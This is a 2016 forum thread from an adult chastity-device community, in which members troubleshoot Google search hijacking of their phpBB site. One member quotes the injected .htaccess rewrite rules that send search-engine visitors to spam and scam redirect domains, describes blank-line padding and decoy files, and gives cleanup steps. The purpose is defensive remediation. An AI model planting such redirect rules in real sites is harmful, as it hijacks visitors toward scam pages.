Google Searches Hijacked

Board announcements, questions from members, etc.

Google Searches Hijacked

Postby ManagedMan » Sat Jun 18, 2016 10:17 pm

Looks like the hijackers are at it again.

When I do a Google search for "Chastity Forums" the two top link results appear to be to www.chastityforums.com, but when clicked take the browser to a variety of porn sites.
Currently wearing: MCN Contender sized short
Also have: HT2 short black, HT2 regular clear, CB-6000, CB-6000s, BirdLock Original
User avatar
ManagedMan
 
Posts: 30
Joined: Sat Feb 13, 2016 8:58 pm
Location: Northern California, USA

Re: Google Searches Hijacked

Postby Minas_Bitch » Tue Jun 21, 2016 1:00 pm

I get this when I am just browsing the site sometimes as well. Has the site been hacked?
User avatar
Minas_Bitch
 
Posts: 13
Joined: Thu Jun 16, 2016 1:12 am

Re: Google Searches Hijacked

Postby TwistedMister » Wed Jun 22, 2016 12:12 pm

An announcement has been in the "Announcements" section since April. See there? At the top of the forum board/thread lists? Where it says "Announcements"?

:facepalm:

Yes, there is an issue, but we seem to be low on the list of getting things fixed.

As a work-around, instead of left-clicking on the search links, right-click and copy the address, and paste it into the browser address bar. That will get you there correctly.
07/01/17 "I *really enjoy* teasing you, getting you all worked up and then leaving you hanging." --Mrs. Twisted
TwistedMister
 
Posts: 2271
Joined: Thu Nov 10, 2011 5:49 pm
Location: Northern New England

Re: Google Searches Hijacked

Postby beheld » Thu Jun 23, 2016 8:50 am

I doubt this will be fixed anytime soon. Multiple people have offered to help, but the admin seem to be fine with it because they have a workaround they use. If you want to use the site, install a plugin like "referer control" and block the HTTP referer for the site. No need for right clicking or anything.

I'm not sure why the admins haven't fixed the issue. I know I've seen several comments from folks that sound competent enough to fix the problem. It should be just a matter of finding the hacked code and removing it. Downloading the code from the server and comparing it to the stock phpbb code would probaby find the problem. Could be something that's been added to the .htaccess file. It could be something injected into the database but that's more unlikely.
beheld
 
Posts: 24
Joined: Tue Nov 17, 2015 10:18 am

Re: Google Searches Hijacked

Postby TwistedMister » Sun Jul 31, 2016 7:31 am

woodenturner wrote:... Could be something that's been added to the .htaccess file...


After a bunch of looking and testing, I believe you hit the nail on the head with the .htaccess file.

----------------------------------------------------------------------------------------
A GET request is sent to 104.131.131.106:80

{request header}
Host: top-24h-can-store.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: -http://top-24h-can-store.com/redirect.php?z=viagra
Connection: keep-alive


The remote host sets a 302 status (temporary redirect)

{response header}
Connection: Keep-Alive
Content-Length: 0
Content-Type: text/html
Date: Sat, 30 Jul 2016 12:01:41 GMT
Keep-Alive: timeout=5, max=100
Location: -http://1empiredirect.com/redirect?aff_id=4106&subid=ht&at=1&tb=http%3A%2F%2Fcdn.nezlobudnya.com%2Fdirectclick%2F%3Faid%3D33745%26uid%3D2382
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: visited=1; expires=Thu, 04-Aug-2016 12:01:41 GMT; Max-Age=432000
X-Powered-By: PHP/5.5.9-1ubuntu4.3


And this is where everybody gets sent off to the porn and dating sites, and, eventually, if they try to back out instead of just closing the browser or right-clicking the 'back' button to get back to a point *before* the redirect, gets the fake computer virus warning with the scam 'tech support' phone number.

Tom, you need to ftp into the server and download the .htaccess file, it should be in the root directory and may be 'hidden'. The .htaccess file is an Apache system file, you may need to select something like "show hidden files" when you open your file manager. Once you locate the file check the content for code that looks like this:

RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ excrescent-interfacer.php?$1 [L]

and

RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|Seznam|seznam)
RewriteRule . http: // top-24h-can-store . com /redirect.php?z=viagra [L]


There may be a "decoy" file, htaccess or .taccess to confuse the real file, and when you check the contents be sure you are scrolling all the way to the end of the file as hackers may add 100s of blank lines before any malicious directives.

You will need to clean up the .htaccess file and remove any "rogue" php files (if any, but I don't think there are, I think they keep the scripts on the other servers) to clean up the hack.

All you should have to do is delete that code as above, and the blank lines, save the file and then upload it back to the server---> make sure to *overwrite* the old .htaccess with the new one you just edited.

Once you've done this, the problem *should* be solved...except you'll need to change the login and password, it is obviously compromised.
07/01/17 "I *really enjoy* teasing you, getting you all worked up and then leaving you hanging." --Mrs. Twisted
TwistedMister
 
Posts: 2271
Joined: Thu Nov 10, 2011 5:49 pm
Location: Northern New England


Return to Administrivia

Who is online

Users browsing this forum: No registered users and 1 guest